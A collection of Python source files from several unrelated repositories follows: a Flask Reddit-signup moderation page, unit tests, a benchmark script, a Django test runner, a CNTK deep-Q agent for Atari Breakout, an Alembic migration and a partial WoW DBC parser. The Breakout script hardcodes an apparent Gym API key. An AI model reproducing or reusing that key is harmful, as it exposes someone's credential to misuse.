# New version of praw does not require explicit use of the OAuth2Util object. Presumably because reddit now REQUIRES oauth.
# o = OAuth2Util.OAuth2Util(redditSession, print_log=True, configfile="../reddit-oauth-credentials.cfg")
# TODO: Testing comment of refresh. We authenticate fresh every time, so presumably no need to do o.refresh().
# o.refresh(force=True)
return redditSession
def getSubmissionsForRedditSession(redditSession):
# submissions = [redditSession.get_submission(submission_id=submissionId) for submissionId in signupPageSubmissionIds]
submissions = [redditSession.submission(id=submissionId) for submissionId in signupPageSubmissionIds]
for submission in submissions:
submission.comments.replace_more(limit=None)
# submission.replace_more_comments(limit=None, threshold=0)
return submissions
def getCommentsForSubmissions(submissions):
comments = []
for submission in submissions:
commentForest = submission.comments
comments += [comment for comment in commentForest.list() if comment.__class__ == praw.models.Comment]
return comments
def retireCommentHash(commentHash):
with open("retiredcommenthashes.txt", "a") as commentHashFile:
commentHashFile.write(commentHash + '\n')
def retiredCommentHashes():
with open("retiredcommenthashes.txt", "r") as commentHashFile:
# return commentHashFile.readlines()
return commentHashFile.read().splitlines()
@app.route('/moderatesignups.html')
def moderatesignups():
global commentHashesAndComments
commentHashesAndComments = {}
stringio = StringIO()
stringio.write('<html>\n<head>\n</head>\n\n')
# redditSession = loginAndReturnRedditSession()
redditSession = loginOAuthAndReturnRedditSession()
submissions = getSubmissionsForRedditSession(redditSession)
flat_comments = getCommentsForSubmissions(submissions)
retiredHashes = retiredCommentHashes()
i = 1
stringio.write('<iframe name="invisibleiframe" style="display:none;"></iframe>\n')
stringio.write("<h3>")
stringio.write(os.getcwd())
stringio.write("<br>\n")
for submission in submissions:
stringio.write(submission.title)
stringio.write("<br>\n")
stringio.write("</h3>\n\n")
stringio.write('<form action="copydisplayduringsignuptoclipboard.html" method="post" target="invisibleiframe">')
stringio.write('<input type="submit" value="Copy display-during-signup.py stdout to clipboard">')
stringio.write('</form>')
for comment in flat_comments:
# print comment.is_root
# print comment.score
i += 1
commentHash = sha1()
commentHash.update(comment.fullname)
commentHash.update(comment.body.encode('utf-8'))
commentHash = commentHash.hexdigest()
if commentHash not in retiredHashes:
commentHashesAndComments[commentHash] = comment
authorName = str(comment.author) # can be None if author was deleted. So check for that and skip if it's None.
stringio.write("<hr>\n")
stringio.write('<font color="blue"><b>')
stringio.write(authorName) # can be None if author was deleted. So check for that and skip if it's None.
stringio.write('</b></font><br>')
if ParticipantCollection().hasParticipantNamed(authorName):
stringio.write(' <small><font color="green">(member)</font></small>')
# if ParticipantCollection().participantNamed(authorName).isStillIn:
# stringio.write(' <small><font color="green">(in)</font></small>')
# else:
# stringio.write(' <small><font color="red">(out)</font></small>')
else:
stringio.write(' <small><font color="red">(not a member)</font></small>')
stringio.write('<form action="takeaction.html" method="post" target="invisibleiframe">')
stringio.write('<input type="submit" name="actiontotake" value="Signup" style="color:white;background-color:green">')
# stringio.write('<input type="submit" name="actiontotake" value="Signup and checkin">')
# stringio.write('<input type="submit" name="actiontotake" value="Relapse">')
# stringio.write('<input type="submit" name="actiontotake" value="Reinstate">')
stringio.write('<input type="submit" name="actiontotake" value="Skip comment">')
stringio.write('<input type="submit" name="actiontotake" value="Skip comment and don\'t upvote">')
stringio.write('<input type="hidden" name="username" value="' + b64encode(authorName) + '">')
stringio.write('<input type="hidden" name="commenthash" value="' + commentHash + '">')
# stringio.write('<input type="hidden" name="commentpermalink" value="' + comment.permalink + '">')
stringio.write('</form>')
stringio.write(bleach.clean(markdown.markdown(comment.body.encode('utf-8')), tags=['p']))
stringio.write("\n<br><br>\n\n")
stringio.write('</html>')
pageString = stringio.getvalue()
stringio.close()
return Response(pageString, mimetype='text/html')
@app.route('/takeaction.html', methods=["POST"])
def takeaction():
username = b64decode(request.form["username"])
commentHash = str(request.form["commenthash"])
# commentPermalink = request.form["commentpermalink"]
actionToTake = request.form["actiontotake"]
# print commentHashesAndComments
comment = commentHashesAndComments[commentHash]
# print "comment: " + str(comment)
if actionToTake == 'Signup':
print "signup - " + username
subprocess.call(['./signup.py', username])
comment.upvote()
retireCommentHash(commentHash)
# if actionToTake == 'Signup and checkin':
# print "signup and checkin - " + username
# subprocess.call(['./signup-and-checkin.sh', username])
# comment.upvote()
# retireCommentHash(commentHash)
# elif actionToTake == 'Relapse':
# print "relapse - " + username
# subprocess.call(['./relapse.py', username])
# comment.upvote()
# retireCommentHash(commentHash)
# elif actionToTake == 'Reinstate':
# print "reinstate - " + username
# subprocess.call(['./reinstate.py', username])
# comment.upvote()
# retireCommentHash(commentHash)
elif actionToTake == 'Skip comment':
print "Skip comment - " + username
comment.upvote()
retireCommentHash(commentHash)
elif actionToTake == "Skip comment and don't upvote":
print "Skip comment and don't upvote - " + username
retireCommentHash(commentHash)
return Response("hello", mimetype='text/html')
@app.route('/copydisplayduringsignuptoclipboard.html', methods=["POST"])
def copydisplayduringsignuptoclipboard():
print "TODO: Copy display to clipboard"
subprocess.call(['./display-during-signup.py'])
return Response("hello", mimetype='text/html')
if __name__ == '__main__':
app.run(host='127.0.0.1', port=flaskport)
|
viniciuschiele/flask-webapi
|
tests/test_status.py
|
from flask_webapi import status
from unittest import TestCase
class TestStatus(TestCase):
def test_is_informational(self):
self.assertFalse(status.is_informational(99))
self.assertFalse(status.is_informational(200))
for i in range(100, 199):
self.assertTrue(status.is_informational(i))
def test_is_success(self):
self.assertFalse(status.is_success(199))
self.assertFalse(status.is_success(300))
for i in range(200, 299):
self.assertTrue(status.is_success(i))
def test_is_redirect(self):
self.assertFalse(status.is_redirect(299))
self.assertFalse(status.is_redirect(400))
for i in range(300, 399):
self.assertTrue(status.is_redirect(i))
def test_is_client_error(self):
self.assertFalse(status.is_client_error(399))
self.assertFalse(status.is_client_error(500))
for i in range(400, 499):
self.assertTrue(status.is_client_error(i))
def test_is_server_error(self):
self.assertFalse(status.is_server_error(499))
self.assertFalse(status.is_server_error(600))
for i in range(500, 599):
self.assertTrue(status.is_server_error(i))
|
Alex-Just/gymlog
|
gymlog/main/tests/test_models.py
|
# from test_plus.test import TestCase
#
#
# class TestUser(TestCase):
#
# def setUp(self):
# self.user = self.make_user()
#
# def test__str__(self):
# self.assertEqual(
# self.user.__str__(),
# 'testuser' # This is the default username for self.make_user()
# )
#
# def test_get_absolute_url(self):
# self.assertEqual(
# self.user.get_absolute_url(),
# '/users/testuser/'
# )
|
jminuscula/dixit-online
|
server/src/dixit/api/auth/serializers/user.py
|
from rest_framework import serializers
from django.contrib.auth.models import User
from dixit.account.models import UserProfile
class UserProfileSerializer(serializers.ModelSerializer):
class Meta:
model = UserProfile
fields = ('name', )
class UserSerializer(serializers.ModelSerializer):
"""
Serializes User objects
"""
profile = UserProfileSerializer()
class Meta:
model = User
fields = ('id', 'username', 'email', 'profile', )
|
simonz05/pack-command
|
misc/bench.py
|
# -*- coding: utf-8 -*-
import pack_command
import pack_command_python
import timeit
import cProfile
import pstats
import pycallgraph
def format_time(seconds):
v = seconds
if v * 1000 * 1000 * 1000 < 1000:
scale = u'ns'
v = int(round(v*1000*1000*1000))
elif v * 1000 * 1000 < 1000:
scale = u'μs'
v = int(round(v*1000*1000))
elif v * 1000 < 1000:
scale = u'ms'
v = round(v*1000, 4)
else:
scale = u'sec'
v = int(v)
return u'{} {}'.format(v, scale)
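# Illustrative check of the scaling logic above (not part of the original
# benchmark): values are promoted to the largest unit that keeps the
# number below 1000.
def _demo_format_time():
    # -> [u'250 ns', u'123 μs', u'45.6 ms', u'2 sec']
    return [format_time(v) for v in (0.00000025, 0.000123, 0.0456, 2.5)]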
# profiler size
number = 100000
sample = 7
# profiler type
profile = False
graph = False
timer = True
def runit():
pack_command.pack_command("ZADD", "foo", 1369198341, 10000)
def runitp():
pack_command_python.pack_command("ZADD", "foo", 1369198341, 10000)
if profile:
pr = cProfile.Profile()
pr.enable()
if graph:
pycallgraph.start_trace()
if timer:
for name, t in (("Python", runitp), ("cython", runit)):
res = timeit.Timer(t).repeat(sample, number)
min_run = min(res)
per_loop = min_run/number
print u'{}'.format(name)
print u'{} total run'.format(format_time(min_run))
print u'{} per/loop'.format(format_time(per_loop))
#print u'{} per/friend'.format(format_time(per_loop/friends_cnt))
else:
for j in xrange(number):
runit()
if graph:
pycallgraph.make_dot_graph('example.png')
if profile:
pr.disable()
ps = pstats.Stats(pr)
sort_by = 'cumulative'
ps.strip_dirs().sort_stats(sort_by).print_stats(20)
|
nwinter/bantling
|
src/application/__init__.py
|
"""
Initialize Flask app
"""
from flask import Flask
import os
from flask_debugtoolbar import DebugToolbarExtension
from werkzeug.debug import DebuggedApplication
app = Flask('application')
if os.getenv('FLASK_CONF') == 'DEV':
# Development settings
app.config.from_object('application.settings.Development')
# Flask-DebugToolbar
toolbar = DebugToolbarExtension(app)
# Google app engine mini profiler
# https://github.com/kamens/gae_mini_profiler
app.wsgi_app = DebuggedApplication(app.wsgi_app, evalex=True)
from gae_mini_profiler import profiler, templatetags
@app.context_processor
def inject_profiler():
return dict(profiler_includes=templatetags.profiler_includes())
app.wsgi_app = profiler.ProfilerWSGIMiddleware(app.wsgi_app)
elif os.getenv('FLASK_CONF') == 'TEST':
app.config.from_object('application.settings.Testing')
else:
app.config.from_object('application.settings.Production')
# Enable jinja2 loop controls extension
app.jinja_env.add_extension('jinja2.ext.loopcontrols')
# Pull in URL dispatch routes
import urls
|
bennybauer/pinax-hello
|
runtests.py
|
#!/usr/bin/env python
import os
import sys
import django
from django.conf import settings
DEFAULT_SETTINGS = dict(
INSTALLED_APPS=[
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sites",
"pinax.pinax_hello",
"pinax.pinax_hello.tests"
],
MIDDLEWARE_CLASSES=[],
DATABASES={
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": ":memory:",
}
},
SITE_ID=1,
ROOT_URLCONF="pinax.pinax_hello.tests.urls",
SECRET_KEY="notasecret",
)
def runtests(*test_args):
if not settings.configured:
settings.configure(**DEFAULT_SETTINGS)
django.setup()
parent = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, parent)
try:
from django.test.runner import DiscoverRunner
runner_class = DiscoverRunner
test_args = ["pinax.pinax_hello.tests"]
except ImportError:
from django.test.simple import DjangoTestSuiteRunner
runner_class = DjangoTestSuiteRunner
test_args = ["tests"]
failures = runner_class(verbosity=1, interactive=True, failfast=False).run_tests(test_args)
sys.exit(failures)
if __name__ == "__main__":
runtests(*sys.argv[1:])
|
tuzzer/ai-gym
|
atari_breakout/atari_breakout_dqn_cntk.py
|
import random
import numpy as np
import math
from time import perf_counter
import os
import sys
from collections import deque
import gym
import cntk
from cntk.layers import Convolution, MaxPooling, Dense
from cntk.models import Sequential, LayerStack
from cntk.initializer import glorot_normal
env = gym.make("Breakout-v0")
NUM_ACTIONS = env.action_space.n
SCREEN_H_ORIG, SCREEN_W_ORIG, NUM_COLOUR_CHANNELS = env.observation_space.shape
def preprocess_image(screen_image):
# crop the top and bottom
screen_image = screen_image[35:195]
# down sample by a factor of 2
screen_image = screen_image[::2, ::2]
# convert to grey scale
grey_image = np.zeros(screen_image.shape[0:2])
for i in range(len(screen_image)):
for j in range(len(screen_image[i])):
grey_image[i][j] = np.mean(screen_image[i][j])
return np.array([grey_image.astype(np.float)])
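# Shape sketch (illustrative, assuming the standard 210x160x3 Breakout
# frame): crop -> (160, 160, 3), 2x downsample -> (80, 80, 3), greyscale
# -> returned array of shape (1, 80, 80).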
CHANNELS, IMAGE_H, IMAGE_W = preprocess_image(np.zeros((SCREEN_H_ORIG, SCREEN_W_ORIG))).shape
STATE_DIMS = (1, IMAGE_H, IMAGE_W)
class Brain:
BATCH_SIZE = 5
def __init__(self):
#### Construct the model ####
observation = cntk.ops.input_variable(STATE_DIMS, np.float32, name="s")
q_target = cntk.ops.input_variable(NUM_ACTIONS, np.float32, name="q")
# Define the structure of the neural network
self.model = self.create_convolutional_neural_network(observation, NUM_ACTIONS)
#### Define the trainer ####
self.learning_rate = cntk.learner.training_parameter_schedule(0.0001, cntk.UnitType.sample)
self.momentum = cntk.learner.momentum_as_time_constant_schedule(0.99)
self.loss = cntk.ops.reduce_mean(cntk.ops.square(self.model - q_target), axis=0)
mean_error = cntk.ops.reduce_mean(cntk.ops.square(self.model - q_target), axis=0)
learner = cntk.adam_sgd(self.model.parameters, self.learning_rate, momentum=self.momentum)
self.trainer = cntk.Trainer(self.model, self.loss, mean_error, learner)
def train(self, x, y):
data = dict(zip(self.loss.arguments, [y, x]))
self.trainer.train_minibatch(data, outputs=[self.loss.output])
def predict(self, s):
return self.model.eval([s])
@staticmethod
def create_multi_layer_neural_network(input_vars, out_dims, num_hidden_layers):
num_hidden_neurons = 128
hidden_layer = lambda: Dense(num_hidden_neurons, activation=cntk.ops.relu)
output_layer = Dense(out_dims, activation=None)
model = Sequential([LayerStack(num_hidden_layers, hidden_layer),
output_layer])(input_vars)
return model
@staticmethod
def create_convolutional_neural_network(input_vars, out_dims):
convolutional_layer_1 = Convolution((5, 5), 32, strides=1, activation=cntk.ops.relu, pad=True,
init=glorot_normal(), init_bias=0.1)
pooling_layer_1 = MaxPooling((2, 2), strides=(2, 2), pad=True)
convolutional_layer_2 = Convolution((5, 5), 64, strides=1, activation=cntk.ops.relu, pad=True,
init=glorot_normal(), init_bias=0.1)
pooling_layer_2 = MaxPooling((2, 2), strides=(2, 2), pad=True)
convolutional_layer_3 = Convolution((5, 5), 128, strides=1, activation=cntk.ops.relu, pad=True,
init=glorot_normal(), init_bias=0.1)
pooling_layer_3 = MaxPooling((2, 2), strides=(2, 2), pad=True)
fully_connected_layer = Dense(1024, activation=cntk.ops.relu, init=glorot_normal(), init_bias=0.1)
output_layer = Dense(out_dims, activation=None, init=glorot_normal(), init_bias=0.1)
model = Sequential([convolutional_layer_1, pooling_layer_1,
convolutional_layer_2, pooling_layer_2,
#convolutional_layer_3, pooling_layer_3,
fully_connected_layer,
output_layer])(input_vars)
return model
class Memory:
def __init__(self, capacity):
self.examplers = deque(maxlen=capacity)
self.capacity = capacity
def add(self, sample):
self.examplers.append(sample)
def get_random_samples(self, num_samples):
num_samples = min(num_samples, len(self.examplers))
return random.sample(tuple(self.examplers), num_samples)
def get_stack(self, start_index, stack_size):
end_index = len(self.examplers) - stack_size
if end_index < 0:
stack = list(self.examplers) + [self.examplers[-1] for _ in range(-end_index)]
else:
start_index = min(start_index, end_index)
stack = [self.examplers[i + start_index] for i in range(stack_size)]
return np.stack(stack, axis=-1)
def get_random_stacks(self, num_samples, stack_size):
start_indices = random.sample(range(len(self.examplers)), num_samples)
return [self.get_stack(start_index, stack_size) for start_index in start_indices]
def get_latest_stack(self, stack_size):
return self.get_stack(len(self.examplers), stack_size)
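# Illustrative sketch (not part of the original script): get_stack pads
# with the most recent sample when fewer than stack_size samples exist,
# so early frames can still form a full stack along the last axis.
def _demo_memory_stack():
    m = Memory(capacity=4)
    m.add(np.zeros((2, 2)))
    return m.get_stack(0, stack_size=3).shape  # -> (2, 2, 3)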
class Agent:
MEMORY_CAPACITY = 100000
DISCOUNT_FACTOR = 0.99
MAX_EXPLORATION_RATE = 1.0
MIN_EXPLORATION_RATE = 0.01
DECAY_RATE = 0.0001
def __init__(self):
self.explore_rate = self.MAX_EXPLORATION_RATE
self.brain = Brain()
self.memory = Memory(self.MEMORY_CAPACITY)
self.steps = 0
def act(self, s):
if random.random() < self.explore_rate:
return random.randint(0, NUM_ACTIONS - 1)
else:
return np.argmax(self.brain.predict(s))
def observe(self, sample):
self.steps += 1
self.memory.add(sample)
        # Decay the exploration rate exponentially toward the minimum
self.explore_rate = self.MIN_EXPLORATION_RATE + (self.MAX_EXPLORATION_RATE - self.MIN_EXPLORATION_RATE) * math.exp(-self.DECAY_RATE * self.steps)
def replay(self):
batch = self.memory.get_random_samples(self.brain.BATCH_SIZE)
batch_len = len(batch)
states = np.array([sample[0] for sample in batch], dtype=np.float32)
no_state = np.zeros(STATE_DIMS)
resultant_states = np.array([(no_state if sample[3] is None else sample[3]) for sample in batch], dtype=np.float32)
q_values_batch = self.brain.predict(states)
future_q_values_batch = self.brain.predict(resultant_states)
x = np.zeros((batch_len, ) + STATE_DIMS).astype(np.float32)
y = np.zeros((batch_len, NUM_ACTIONS)).astype(np.float32)
for i in range(batch_len):
state, action, reward, resultant_state = batch[i]
q_values = q_values_batch[0][i]
if resultant_state is None:
q_values[action] = reward
else:
q_values[action] = reward + self.DISCOUNT_FACTOR * np.amax(future_q_values_batch[0][i])
x[i] = state
y[i] = q_values
self.brain.train(x, y)
@classmethod
def action_from_output(cls, output_array):
return np.argmax(output_array)
def run_simulation(agent, solved_reward_level):
state = env.reset()
state = preprocess_image(state)
total_rewards = 0
time_step = 0
while True:
#env.render()
time_step += 1
action = agent.act(state.astype(np.float32))
resultant_state, reward, done, info = env.step(action)
resultant_state = preprocess_image(resultant_state)
if done: # terminal state
resultant_state = None
agent.observe((state, action, reward, resultant_state))
agent.replay()
state = resultant_state
total_rewards += reward
if total_rewards > solved_reward_level or done:
return total_rewards, time_step
def test(model_path, num_episodes=10):
    root = cntk.load_model(model_path)
    for episode in range(num_episodes):
        observation = env.reset()  # reset environment for new episode
        done = False  # reset the flag so every episode runs, not just the first
        while not done:
            try:
                env.render()
            except Exception:
                # this might fail on a VM without OpenGL
                pass
            observation = preprocess_image(observation)
            action = np.argmax(root.eval(observation.astype(np.float32)))
            observation, reward, done, info = env.step(action)
if __name__ == "__main__":
# Ensure we always get the same amount of randomness
np.random.seed(0)
GYM_ENABLE_UPLOAD = False
GYM_VIDEO_PATH = os.path.join(os.getcwd(), "videos", "atari_breakout_dpn_cntk")
GYM_API_KEY = "sk_93AMQvdmReWCi8pdL4m6Q"
MAX_NUM_EPISODES = 1000
STREAK_TO_END = 120
DONE_REWARD_LEVEL = 50
TRAINED_MODEL_DIR = os.path.join(os.getcwd(), "trained_models")
if not os.path.exists(TRAINED_MODEL_DIR):
os.makedirs(TRAINED_MODEL_DIR)
TRAINED_MODEL_NAME = "atari_breakout_dpn.mod"
EPISODES_PER_PRINT_PROGRESS = 1
EPISODES_PER_SAVE = 5
if len(sys.argv) < 2 or sys.argv[1] != "test_only":
if GYM_ENABLE_UPLOAD:
env.monitor.start(GYM_VIDEO_PATH, force=True)
agent = Agent()
episode_number = 0
num_streaks = 0
reward_sum = 0
time_step_sum = 0
solved_episode = -1
training_start_time = perf_counter()
while episode_number < MAX_NUM_EPISODES:
# Run the simulation and train the agent
reward, time_step = run_simulation(agent, DONE_REWARD_LEVEL*2)
reward_sum += reward
time_step_sum += time_step
episode_number += 1
if episode_number % EPISODES_PER_PRINT_PROGRESS == 0:
t = perf_counter() - training_start_time
print("(%d s) Episode: %d, Average reward = %.3f, Average number of time steps = %.3f."
% (t, episode_number, reward_sum / EPISODES_PER_PRINT_PROGRESS, time_step_sum/EPISODES_PER_PRINT_PROGRESS))
reward_sum = 0
time_step_sum = 0
            # An episode counts as solved when its reward exceeds DONE_REWARD_LEVEL
            if reward > DONE_REWARD_LEVEL:
num_streaks += 1
solved_episode = episode_number
else:
num_streaks = 0
solved_episode = -1
# It's considered done when it's solved over 120 times consecutively
if num_streaks > STREAK_TO_END:
print("Task solved in %d episodes and repeated %d times." % (episode_number, num_streaks))
break
if episode_number % EPISODES_PER_SAVE == 0:
agent.brain.model.save_model(os.path.join(TRAINED_MODEL_DIR, TRAINED_MODEL_NAME), False)
agent.brain.model.save_model(os.path.join(TRAINED_MODEL_DIR, TRAINED_MODEL_NAME), False)
if GYM_ENABLE_UPLOAD:
env.monitor.close()
gym.upload(GYM_VIDEO_PATH, api_key=GYM_API_KEY)
# testing the model
test(os.path.join(TRAINED_MODEL_DIR, TRAINED_MODEL_NAME), num_episodes=10)
|
sunrin92/LearnPython
|
1-lpthw/ex32.py
|
the_count = [1, 2, 3, 4, 5]
fruits = ['apple', 'oranges', 'pears', 'apricots',]
change = [1, 'pennies', 2, 'dimes', 3, 'quarters',]
#this first kind of for-loop goes through a list
for number in the_count:
print("This is count %d" % number)
# same as above
for fruit in fruits:
print("A fruit of type: %s" % fruit)
# also we can go through mixed lists too
# notice we have to use %r since we don't know what's in it
for i in change:
print("I got %r " % i)
# we can also build lists, first start with an empty one
elements = []
# then use the range function to do 0 to 5 counts
for i in range(0,6):
print("Adding %d to the list." % i)
# append is a function that lists understand
elements.append(i)
# now we can print them out too
for i in elements:
print("Element was: %d" % i)
|
fedspendingtransparency/data-act-validator
|
dataactvalidator/migrations/versions/c0a714ade734_adding_timestamps_to_all_tables.py
|
"""adding timestamps to all tables
Revision ID: c0a714ade734
Revises: 1a886e694fca
Create Date: 2016-04-20 14:46:06.407765
"""
# revision identifiers, used by Alembic.
revision = 'c0a714ade734'
down_revision = '1a886e694fca'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade(engine_name):
globals()["upgrade_%s" % engine_name]()
def downgrade(engine_name):
globals()["downgrade_%s" % engine_name]()
def upgrade_validation():
### commands auto generated by Alembic - please adjust! ###
op.add_column('field_type', sa.Column('created_at', sa.DateTime(), nullable=True))
op.add_column('field_type', sa.Column('updated_at', sa.DateTime(), nullable=True))
op.add_column('file_columns', sa.Column('created_at', sa.DateTime(), nullable=True))
op.add_column('file_columns', sa.Column('updated_at', sa.DateTime(), nullable=True))
op.add_column('file_type', sa.Column('created_at', sa.DateTime(), nullable=True))
op.add_column('file_type', sa.Column('updated_at', sa.DateTime(), nullable=True))
op.add_column('multi_field_rule', sa.Column('created_at', sa.DateTime(), nullable=True))
op.add_column('multi_field_rule', sa.Column('updated_at', sa.DateTime(), nullable=True))
op.add_column('multi_field_rule_type', sa.Column('created_at', sa.DateTime(), nullable=True))
op.add_column('multi_field_rule_type', sa.Column('updated_at', sa.DateTime(), nullable=True))
op.add_column('rule', sa.Column('created_at', sa.DateTime(), nullable=True))
op.add_column('rule', sa.Column('updated_at', sa.DateTime(), nullable=True))
op.add_column('rule_timing', sa.Column('created_at', sa.DateTime(), nullable=True))
op.add_column('rule_timing', sa.Column('updated_at', sa.DateTime(), nullable=True))
op.add_column('rule_type', sa.Column('created_at', sa.DateTime(), nullable=True))
op.add_column('rule_type', sa.Column('updated_at', sa.DateTime(), nullable=True))
op.add_column('tas_lookup', sa.Column('created_at', sa.DateTime(), nullable=True))
op.add_column('tas_lookup', sa.Column('updated_at', sa.DateTime(), nullable=True))
### end Alembic commands ###
def downgrade_validation():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('tas_lookup', 'updated_at')
op.drop_column('tas_lookup', 'created_at')
op.drop_column('rule_type', 'updated_at')
op.drop_column('rule_type', 'created_at')
op.drop_column('rule_timing', 'updated_at')
op.drop_column('rule_timing', 'created_at')
op.drop_column('rule', 'updated_at')
op.drop_column('rule', 'created_at')
op.drop_column('multi_field_rule_type', 'updated_at')
op.drop_column('multi_field_rule_type', 'created_at')
op.drop_column('multi_field_rule', 'updated_at')
op.drop_column('multi_field_rule', 'created_at')
op.drop_column('file_type', 'updated_at')
op.drop_column('file_type', 'created_at')
op.drop_column('file_columns', 'updated_at')
op.drop_column('file_columns', 'created_at')
op.drop_column('field_type', 'updated_at')
op.drop_column('field_type', 'created_at')
### end Alembic commands ###
|
jleclanche/pywow
|
wdbc/main.py
|
from cStringIO import StringIO
from struct import pack, unpack, error as StructError
from .log import log
from .structures import fields
class DBFile(object):
"""
Base class for WDB and DBC files
"""
@classmethod
def open(cls, file, build, structure, environment):
if isinstance(file, basestring):
file = open(file, "rb")
instance = cls(file, build, environment)
instance._readHeader()
instance.setStructure(structure)
instance._rowDynamicFields = 0 # Dynamic fields index, used when parsing a row
instance._readAddresses()
return instance
def __init__(self, file=None, build=None, environment=None):
self._addresses = {}
self._values = {}
self.file = file
self.build = build
self.environment = environment
def __repr__(self):
return "%s(file=%r, build=%r)" % (self.__class__.__name__, self.file, self.build)
def __contains__(self, id):
return id in self._addresses
def __getitem__(self, item):
if isinstance(item, slice):
keys = sorted(self._addresses.keys())[item]
return [self[k] for k in keys]
if item not in self._values:
self._parse_row(item)
return self._values[item]
def __setitem__(self, item, value):
if not isinstance(item, int):
raise TypeError("DBFile indices must be integers, not %s" % (type(item)))
if isinstance(value, DBRow):
self._values[item] = value
self._addresses[item] = -1
else:
# FIXME technically we should allow DBRow, but this is untested and will need resetting parent
raise TypeError("Unsupported type for DBFile.__setitem__: %s" % (type(value)))
def __delitem__(self, item):
if item in self._values:
del self._values[item]
del self._addresses[item]
def __iter__(self):
return self._addresses.__iter__()
def __len__(self):
return len(self._addresses)
def _add_row(self, id, address, reclen):
if id in self._addresses: # Something's wrong here
log.warning("Multiple instances of row %r found in %s" % (id, self.file.name))
self._addresses[id] = (address, reclen)
def _parse_field(self, data, field, row=None):
"""
Parse a single field in stream.
"""
if field.dyn > self._rowDynamicFields:
return None # The column doesn't exist in this row, we set it to None
ret = None
try:
if isinstance(field, fields.StringField):
ret = self._parse_string(data)
elif isinstance(field, fields.DataField): # wowcache.wdb
length = getattr(row, field.master)
ret = data.read(length)
elif isinstance(field, fields.DynamicMaster):
ret, = unpack("<I", data.read(4))
self._rowDynamicFields = ret
else:
ret, = unpack("<%s" % (field.char), data.read(field.size))
except StructError:
log.warning("Field %s could not be parsed properly" % (field))
ret = None
return ret
def supportsSeeking(self):
return hasattr(self.file, "seek")
def append(self, row):
"""
Append a row at the end of the file.
If the row does not have an id, one is automatically assigned.
"""
		i = len(self) + 1  # FIXME this won't work properly in incomplete files
if "_id" not in row:
row["_id"] = i
self[i] = row
def clear(self):
"""
Delete every row in the file
"""
for k in self.keys(): # Use key, otherwise we get RuntimeError: dictionary changed size during iteration
del self[k]
def keys(self):
return self._addresses.keys()
def items(self):
return [(k, self[k]) for k in self]
def parse_row(self, data, reclen=0):
"""
Assign data to a DBRow instance
"""
return DBRow(self, data=data, reclen=reclen)
def values(self):
"""
Return a list of the file's values
"""
return [self[id] for id in self]
def setRow(self, key, **values):
self.__setitem__(key, DBRow(self, columns=values))
def size(self):
if hasattr(self.file, "size"):
return self.file.size()
elif isinstance(self.file, file):
from os.path import getsize
return getsize(self.file.name)
raise NotImplementedError
def update(self, other):
"""
Update file from iterable other
"""
for k in other:
self[k] = other[k]
def write(self, filename=""):
"""
Write the file data on disk. If filename is not given, use currently opened file.
"""
_filename = filename or self.file.name
data = self.header.data() + self.data() + self.eof()
f = open(_filename, "wb") # Don't open before calling data() as uncached rows would be empty
f.write(data)
f.close()
log.info("Written %i bytes at %s" % (len(data), f.name))
if not filename: # Reopen self.file, we modified it
# XXX do we need to wipe self._values here?
self.file.close()
self.file = open(f.name, "rb")
class DBRow(list):
"""
A database row.
	Attribute names of this class must not be used as field names in structures.
"""
initialized = False
def __init__(self, parent, data=None, columns=None, reclen=0):
self._parent = parent
self._values = {} # Columns values storage
self.structure = parent.structure
self.initialized = True # needed for __setattr__
if columns:
if type(columns) == list:
self.extend(columns)
elif type(columns) == dict:
self._default()
_cols = [k.name for k in self.structure]
for k in columns:
try:
self[_cols.index(k)] = columns[k]
except ValueError:
log.warning("Column %r not found" % (k))
elif data:
dynfields = 0
data = StringIO(data)
for field in self.structure:
_data = parent._parse_field(data, field, self)
self.append(_data)
if reclen:
real_reclen = reclen + self._parent.row_header_size
if data.tell() != real_reclen:
log.warning("Reclen not respected for row %r. Expected %i, read %i. (%+i)" % (self.id, real_reclen, data.tell(), real_reclen-data.tell()))
def __dir__(self):
result = self.__dict__.keys()
result.extend(self.structure.column_names)
return result
def __getattr__(self, attr):
if attr in self.structure:
return self._get_value(attr)
if attr in self.structure._abstractions: # Union abstractions etc
field, func = self.structure._abstractions[attr]
return func(field, self)
if "__" in attr:
return self._query(attr)
return super(DBRow, self).__getattribute__(attr)
def __int__(self):
return self.id
def __setattr__(self, attr, value):
# Do not preserve the value in DBRow! Use the save method to save.
if self.initialized and attr in self.structure:
self._set_value(attr, value)
return super(DBRow, self).__setattr__(attr, value)
def __setitem__(self, index, value):
if not isinstance(index, int):
raise TypeError("Expected int instance, got %s instead (%r)" % (type(index), index))
list.__setitem__(self, index, value)
col = self.structure[index]
self._values[col.name] = col.to_python(value, row=self)
def _get_reverse_relation(self, table, field):
"""
Return a list of rows matching the reverse relation
"""
if not hasattr(self._parent, "_reverse_relation_cache"):
self._parent._reverse_relation_cache = {}
cache = self._parent._reverse_relation_cache
tfield = table + "__" + field
if tfield not in cache:
cache[tfield] = {}
# First time lookup, let's build the cache
table = self._parent.environment.dbFile(table)
for row in table:
row = table[row]
id = row._raw(field)
if id not in cache[tfield]:
cache[tfield][id] = []
cache[tfield][id].append(row)
return cache[tfield].get(self.id, None)
def _matches(self, **kwargs):
for k, v in kwargs.items():
if not self._query(k, v):
return False
return True
def _query(self, rel, value=None):
"""
Parse a django-like multilevel relationship
"""
rels = rel.split("__")
if "" in rels: # empty string
raise ValueError("Invalid relation string")
first = rels[0]
if not hasattr(self, first):
if self._parent.environment.hasDbFile(first):
# Handle reverse relations, eg spell__item for item table
remainder = rel[len(first + "__"):]
return self._get_reverse_relation(first, remainder)
raise ValueError("Invalid relation string")
ret = self
rels = rels[::-1]
special = {
"contains": lambda x, y: x in y,
"exact": lambda x, y: x == y,
"icontains": lambda x, y: x.lower() in y.lower(),
"iexact": lambda x, y: x.lower() == y.lower(),
"gt": lambda x, y: x > y,
"gte": lambda x, y: x >= y,
"lt": lambda x, y: x < y,
"lte": lambda x, y: x <= y,
}
while rels:
if rels[-1] in special:
if len(rels) != 1:
# icontains always needs to be the last piece of the relation string
raise ValueError("Invalid relation string")
return special[rels[-1]](value, ret)
else:
ret = getattr(ret, rels.pop())
return ret
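	# Illustrative examples (hypothetical column names, not part of the
	# original module):
	#   row._query("name__icontains", "sword")  # case-insensitive substring
	#   row._query("category__name")  # follow the relation, then read "name"
	# A special comparison suffix must be the last segment of the string.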
def _set_value(self, name, value):
